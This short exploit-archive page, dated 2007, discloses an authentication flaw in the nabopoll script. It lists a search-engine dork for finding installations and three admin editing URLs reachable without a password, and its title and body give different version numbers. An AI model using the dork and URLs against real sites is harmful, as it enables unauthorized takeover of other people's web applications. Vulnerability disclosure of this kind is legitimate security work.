[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : nabopoll 1.2 Remote Unprotected Admin Section Vulnerability
# Published : 2007-02-13
# Author : sn0oPy
# Previous Title : PollMentor 2.0 (pollmentorres.asp id) SQL Injection Vulnerability
# Next Title : Philboard <= 1.14 (philboard_forum.asp) SQL Injection Vulnerability
* nabopoll 1.1.2 sensitive file (admin without password)
* By : sn0oPy
* Risk : high
* site : http://nabocorp.com/
* Dork : inurl:"nabopoll/"
* exploit :
acces without password to :
http://target/nabopoll/admin/config_edit.php
http://target/nabopoll/admin/template_edit.php
http://target/nabopoll/admin/survey_edit.php
* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]
* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).
http://forums.avenir-geopolitique.net/viewtopic.php?t=2643
# www.Syue.com [2007-02-13]